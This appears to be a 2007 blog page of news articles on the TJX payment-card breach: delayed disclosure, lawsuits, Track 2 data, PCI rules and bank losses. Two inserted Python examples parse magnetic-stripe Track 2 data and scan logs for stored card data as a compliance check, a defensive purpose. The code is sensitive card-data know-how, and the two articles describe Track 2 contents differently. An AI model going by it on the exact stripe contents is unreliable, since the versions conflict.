Meanwhile, a Canadian law firm, the Merchant Law Group, filed a class-action lawsuit against Winners and HomeSense, two TJX-owned retailers in Canada whose customers were affected by the breach.
The lawsuit was filed in courts in six Canadian provinces and seeks "financial recovery on behalf of all individuals for whom personal information has been revealed," a statement posted on the company's Web site said.
"There's a variety of issues, from the negligence of these companies to protect credit-card information to issues of violations of privacy legislation and other legislation that protect personal information in Canada," said Evatt Merchant, a partner at the law firm.
"In terms of corrective action, there would have to be safeguards to make sure this didn't happen again, and damages have to be assessed on a classwide basis, though obviously that is something that is a bit downstream" right now, he said. He added that public response to the lawsuits has been "significant."
McConnell said TJX had no comment on the lawsuit.
TJX said last Wednesday that an "unauthorized intruder" had gained access to its system and may have stolen credit and debit card data belonging to an unspecified number of customers in the U.S., Canada and Puerto Rico, and possibly in the U.K. and Ireland.
The retailer, which owns discount retail chains including TJ Maxx, Marshalls and Bob's Stores, didn't disclose the number of shoppers that may have been affected by the breach, saying that the full extent of the data theft "is not yet known."
The compromised data included so-called Track 2 data taken from the magnetic stripes on the back of credit and debit cards. Track 2 data includes the account number, expiration date and service code, followed by discretionary data that card-issuing banks fill at their discretion, typically PIN verification values derived from the cardholder's PIN and a card verification code. Storing full track data after a transaction has been authorized is forbidden under the Payment Card Industry (PCI) Data Security Standard rules being pushed by the major credit card companies.
So far, about 50 banks in Massachusetts alone have been affected by the TJX breach, according to a spokesman at the Massachusetts Bankers Association.
Ryan Fisher, senior risk manager at Madison, Wis.-based CUNA Mutual Group, which insures about 5,500 credit unions, said that while the scope of the breach is unknown, it appears to have had an impact on a substantial number of credit unions as well.
"The sense is that it is widespread," he said. "We do see multiple credit unions in different regions impacted," he said.
The fact that some of the compromised data included Track 2 data is very disappointing, he said. There is also a "certain level of disappointment" that credit card companies have not been enforcing the standards more effectively, he said.
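To make concrete what "Track 2 data" means and what a merchant is allowed to keep, here is an added example written for this page (not code from the article, TJX or the card brands). It parses the ISO/IEC 7813 Track 2 layout, validates the account number's Luhn check digit, reduces a parsed record to the fields PCI DSS permits at rest (truncated PAN and expiry), and scans a constructed point-of-sale debug log for full track data sitting where it never should be. The test PANs are the publicly known 4111... and 5555... numbers; the log lines are invented.

```python
"""Track 2 data: what is on the stripe, and what a merchant may keep.

Added example, not code from the article or from TJX. The PANs are the
well-known test numbers 4111... and 5555... and the log lines are
constructed. Layout follows ISO/IEC 7813 Track 2:

    ;PAN=YYMMSSSddd...?   PAN up to 19 digits, YYMM expiry, SSS service
                          code, ddd... issuer discretionary data (where
                          PIN verification and card verification values live)

PCI DSS requirement 3.2 forbids storing full track data, card verification
codes or PIN data after authorization; requirement 3.3 permits displaying at
most the first six and last four digits of the PAN.
"""
import re
from dataclasses import dataclass

TRACK2_RE = re.compile(
    r";?(?<!\d)(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d*)\??"
)

# Constructed point-of-sale debug log. A scanner that finds full track data
# in files like this is the kind of internal control the breach showed missing.
SAMPLE_LOG = """\
2007-05-12 10:31:04 pos07 auth ok txn=88213 amt=34.99
2007-05-12 10:31:05 pos07 DEBUG swipe=;4111111111111111=2512101123456789?
2007-05-12 10:31:09 pos07 DEBUG swipe=;1234567812345678=2512101000000000?
2007-05-12 10:32:41 pos03 DEBUG raw track2 5555555555554444=2701201000000000 batch=9
"""


@dataclass
class Track2:
    pan: str
    expiry_yymm: str
    service_code: str
    discretionary: str


def luhn_ok(pan: str) -> bool:
    """ISO/IEC 7812 check digit; filters most random digit runs out of scans."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def parse_track2(raw: str) -> Track2:
    m = TRACK2_RE.fullmatch(raw.strip())
    if not m or not luhn_ok(m["pan"]):
        raise ValueError("not a valid Track 2 string")
    return Track2(m["pan"], m["exp"], m["svc"], m["disc"])


def is_chip_card(t: Track2) -> bool:
    """Service codes 2xx and 6xx mean the card carries a chip. A terminal that
    sees one on a stripe-only swipe may be looking at a clone of a chip card
    and should not silently fall back to magstripe processing."""
    return t.service_code[0] in "26"


def pci_retainable(t: Track2) -> dict:
    """The only pieces a merchant may keep after authorization: a truncated PAN
    (first six, last four) and the expiry. Service code and discretionary data
    are dropped, not masked, because that is where the verification values sit."""
    masked = t.pan[:6] + "*" * (len(t.pan) - 10) + t.pan[-4:]
    return {"pan_masked": masked, "expiry": t.expiry_yymm}


def find_stored_track_data(text: str) -> list:
    """Scan logs or dumps for full Track 2 strings at rest. Only masked PANs are
    returned so the findings report does not itself become stored card data."""
    hits = []
    for m in TRACK2_RE.finditer(text):
        if luhn_ok(m["pan"]):
            hits.append(pci_retainable(parse_track2(m.group(0)))["pan_masked"])
    return hits


if __name__ == "__main__":
    t = parse_track2(";4111111111111111=2512101123456789?")
    print(t, is_chip_card(t), pci_retainable(t))
    print(find_stored_track_data(SAMPLE_LOG))
```

The scanner is deliberately narrow: it looks for the `PAN=YYMMSSS` shape rather than any 16-digit run, which keeps false positives low in noisy logs, and it reports masked PANs only, so that the evidence of a violation is not a second copy of the cardholder data. The Luhn check is a filter, not proof: the third log line is shaped like track data but fails the check digit and is dropped.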
Jaikumar Vijayan
January 22, 2007 (Computerworld) The data breach at TJX Cos. that exposed sensitive credit and debit card data on an unknown number of customers occurred nearly seven months before it was detected, a company spokeswoman said today.
The breach occurred as far back as mid-May 2006 but was discovered only in mid-December, said company spokeswoman Debra McConnell. The original statement from Framingham, Mass.-based TJX announcing the data compromise last week mentioned only the discovery of the breach in December and made no reference to when the breach actually happened.
McConnell said the decision not to mention when the breach happened did not represent an "inconsistency" in the company's public reporting of the incident. "We had said in our press release that we had discovered the breach in mid-December but we did not put in when it occurred," she said.
McConnell did not provide details on the scope of the breach but reiterated the company's earlier statement that credit and debit card information belonging to "a limited number" of individuals had been stolen from the compromised system. "And by 'limited' we mean substantially less than millions," she said.
Meanwhile, a Canadian law firm, the Merchant Law Group, filed a class-action lawsuit against Winners and HomeSense, two TJX-owned retailers in Canada whose customers were affected by the breach.
The lawsuit was filed in courts in six Canadian provinces and seeks "financial recovery on behalf of all individuals for whom personal information has been revealed," a statement posted on the company's Web site said.
"There's a variety of issues, from the negligence of these companies to protect credit-card information to issues of violations of privacy legislation and other legislation that protect personal information in Canada," said Evatt Merchant a partner at the law firm.
"In terms of corrective action, there would have to be safeguards to make sure this didn't happen again, and damages have to be assessed on a classwide basis, though obviously that is something that is a bit downstream," right now, he said. He added that public response to the lawsuits has been "significant."
McConnell said TJX had no comment on the lawsuit.
TJX said last Wednesday that an "unauthorized intruder" had gained access to its system and may have stolen credit and debit card data belonging to an unspecified number of customers in the U.S., Canada and Puerto Rico, and possibly in the U.K. and Ireland.
The retailer, which owns discount retail chains including TJ Maxx, Marshalls and Bob's Stores, didn't disclose the number of shoppers that may have been affected by the breach, saying that the full extent of the data theft "is not yet known."
The compromised data included so-called Track 2 data taken from the magnetic stripes on the back of credit and debit cards. Track 2 data includes account numbers, expiration dates and encrypted personal identification numbers, plus other information that card-issuing banks can include at their discretion. The storage of such information by retailers is forbidden under the Payment Card Industry (PCI) data security standard rules being pushed by the major credit card companies.
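As an added example (not from the article), here is the kind of check a PCI assessor or defender runs over point-of-sale logs to find stored Track 2 data. It assumes the ISO/IEC 7813 Track 2 layout (start sentinel `;`, PAN, `=`, expiry YYMM, three-digit service code, discretionary data, end sentinel `?`) and a constructed log sample using a well-known test PAN.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of a point-of-sale log: line 2 leaks a full Track 2
# record in a debug message, which PCI DSS forbids retailers to store.
SAMPLE_LOG = """\
2006-12-18 09:14:02 POS-0412 sale approved amount=42.17 pan=************1111
2006-12-18 09:14:05 POS-0412 debug swipe=;4111111111111111=09121011234567890?
2006-12-18 09:15:11 POS-0412 sale declined amount=13.00 pan=************0005
"""

# ISO/IEC 7813 Track 2: ;PAN=YYMM SSS discretionary ?
TRACK2_RE = re.compile(
    r";(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>[^?]*)\?"
)


@dataclass
class Track2Finding:
    line_no: int
    masked_pan: str
    expiry: str
    service_code: str


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; used to drop digit runs that are not real PANs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep only first six and last four digits, as PCI display rules allow."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(text: str) -> List[Track2Finding]:
    """Return one finding per Luhn-valid Track 2 record; never echo the PAN."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in TRACK2_RE.finditer(line):
            pan = m.group("pan")
            if not luhn_ok(pan):
                continue
            findings.append(
                Track2Finding(n, mask_pan(pan), m.group("exp"), m.group("svc"))
            )
    return findings
```

Discretionary data is matched but deliberately not retained, so the finding report itself does not become another copy of prohibited data.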
So far, about 50 banks in Massachusetts alone have been affected by the TJX breach, according to a spokesman at the Massachusetts Bankers Association.
Ryan Fisher, senior risk manager at Madison, Wis.-based CUNA Mutual Group, which insures about 5,500 credit unions, said that while the scope of the breach is unknown, it appears to have had an impact on a substantial number of credit unions as well.
"The sense is that it is widespread," he said. "We do see multiple credit unions in different regions impacted," he said.
The fact that some of the compromised data included Track 2 data is very disappointing, he said. There is also a "certain level of disappointment" that credit card companies have not been enforcing the standards more effectively, he said.
Labels: TJX Companies Inc.
Sunday, January 21, 2007
Retailer TJX reports computer hack
The extent of the breach of TJX Companies’ network is still unclear
By Ellen Messmer, Network World, 01/18/07
Framingham, Mass.-based retailer TJX Companies, which operates T.J. Maxx, Marshalls and other stores, warned customers that its computer network has been broken into, compromising customer credit-card information and other data.
In a letter posted on the TJX Web site today, company founder and chairman Ben Cammarata wrote of his disappointment about the discovery of the unauthorized intrusion into the company’s network, and said an investigation is ongoing to understand its consequences more fully. TJX has set up toll-free phone numbers in the United States, Canada, the United Kingdom and Ireland to take questions from customers about the security incident.
“I can tell you that we were extremely disappointed when we determined that we have suffered an unauthorized intrusion into our computer systems that process and store information related to customer transactions,” Cammarata stated in the public letter. He noted: “While there is much we still have yet to understand about this issue, I can assure you that we are taking steps to safeguard confidential information and working closely with law enforcement in the U.S., Canada and the U.K. so that those responsible for this act will be brought to justice.”
In a separate statement, TJX said it discovered the intrusion into its systems for processing credit, debit and returns in mid-December 2006 and immediately notified law enforcement. TJX added that “it immediately engaged General Dynamics and IBM,” hiring them to “monitor and evaluate the intrusion, assess possible data compromise, and seek to identify affected information.” The two vendors are also expected to help TJX upgrade its systems.
TJX so far has determined that the intrusion involves computers pertaining to its T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the United States and Puerto Rico, and its Winners and HomeSense stores in Canada. While it has not yet confirmed further penetration in its network, TJX suspects intruders also may have breached systems related to its T.K. Maxx stores in the United Kingdom and Ireland and its Bob’s Stores in the United States.
As part of the statement, TJX also noted the company “does not yet have enough information to estimate the extent of the financial cost it will incur as a result of the situation.”
Labels: TJX Companies Inc.
Friday, January 19, 2007
Massive Security Breach Reveals Credit Card Data
Jan 18, 2007
The TJX Companies, a large retailer that operates more than 2,000 retail stores under brands such as Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx and A.J. Wright, said on Wednesday that it suffered a massive computer breach on a portion of its network that handles credit card, debit card, check and merchandise transactions in the United States and abroad.
The company does not know the extent of the breach, which was first discovered in December 2006. However, hackers may have made off with credit and debit information from transactions in the United States, Canada and Puerto Rico in 2003 as well as transactions between May and December 2006, according to a company statement.
Banking officials in Massachusetts say the TJX breach is behind a recent warning by Visa to banks in Massachusetts, which have contacted customers in recent days and had to reissue thousands of ATM and debit cards. In the end, the hack may affect a wide range of credit card companies and thousands of consumers in America and in countries like the United Kingdom and Ireland, experts say.
TJX said it is working with IBM and General Dynamics to investigate the breach, which is believed to have occurred on computer systems that process and store information on customer transactions for T.J. Maxx, Marshalls, HomeGoods and A.J. Wright. Transactions from T.K. Maxx in the United Kingdom and Ireland may have also been exposed in the breach.
TJX said it knows of "a limited number of credit card and debit card holders whose information was removed from the system," and has provided that information to credit card companies. TJX is also working with law enforcement, including the U.S. Department of Justice, U.S. Secret Service and Royal Canadian Mounted Police, TJX said in its statement.
The company said it does not yet have enough information to determine the extent of the breach or what other customer information may have been compromised, nor can it quantify the financial impact of the breach.
Between eight and 10 Massachusetts banks have already had customers whose accounts were raided as a result of the breach. Those banks have had to reissue debit cards in response, said Bruce Spitzer, director of communications at the Massachusetts Bankers Association (MBA).
However, the MBA is still surveying its membership of 205 banks and credit unions. The effect of the TJX hack could be much wider and international in scope, he said.
Fitchburg Savings Bank in Fitchburg, Mass., has had to reissue 1,300 cards to customers whose account information was stolen, said Linda Racine, an executive vice president at the bank.
Fitchburg Savings was contacted by Visa on Monday night about the compromised customer accounts. However, the credit card company would not reveal the identity of the retailer that was the source of the breach, citing company rules, Racine said.
Fitchburg Savings has sent letters to customers and reissued cards for affected accounts. However, no Fitchburg Savings customers appear to have been victims of fraud so far, she said.
The TJX breach recalls other recent hacks, including one at BJ’s Wholesale Club and another, reportedly at OfficeMax, in 2005. Those breaches, as well as incidents like the hacking of card processor CardSystems, prompted the payment card industry to issue new rules, dubbed PCI, about how sensitive data is stored and transmitted on internal systems.
However, Spitzer of the MBA said that banks still bore the brunt of security breaches at retailers because they have to pay to reissue cards to customers and absorb the financial losses from unauthorized account withdrawals. Small banks and credit unions often have trouble absorbing those costs, though they are not at fault in the breach itself, Spitzer said.
Spitzer took issue with the delay between the time TJX learned of the breach and when his organization and banks were notified as well as with Visa’s policy of keeping the source of the breach a secret.
"We would have liked to know sooner," he said.
MBA is working with state and federal lawmakers to hold card companies and retailers more accountable for the costs of security lapses, he said.
-Paul F. Roberts, InfoWorld
Labels: TJX Companies Inc.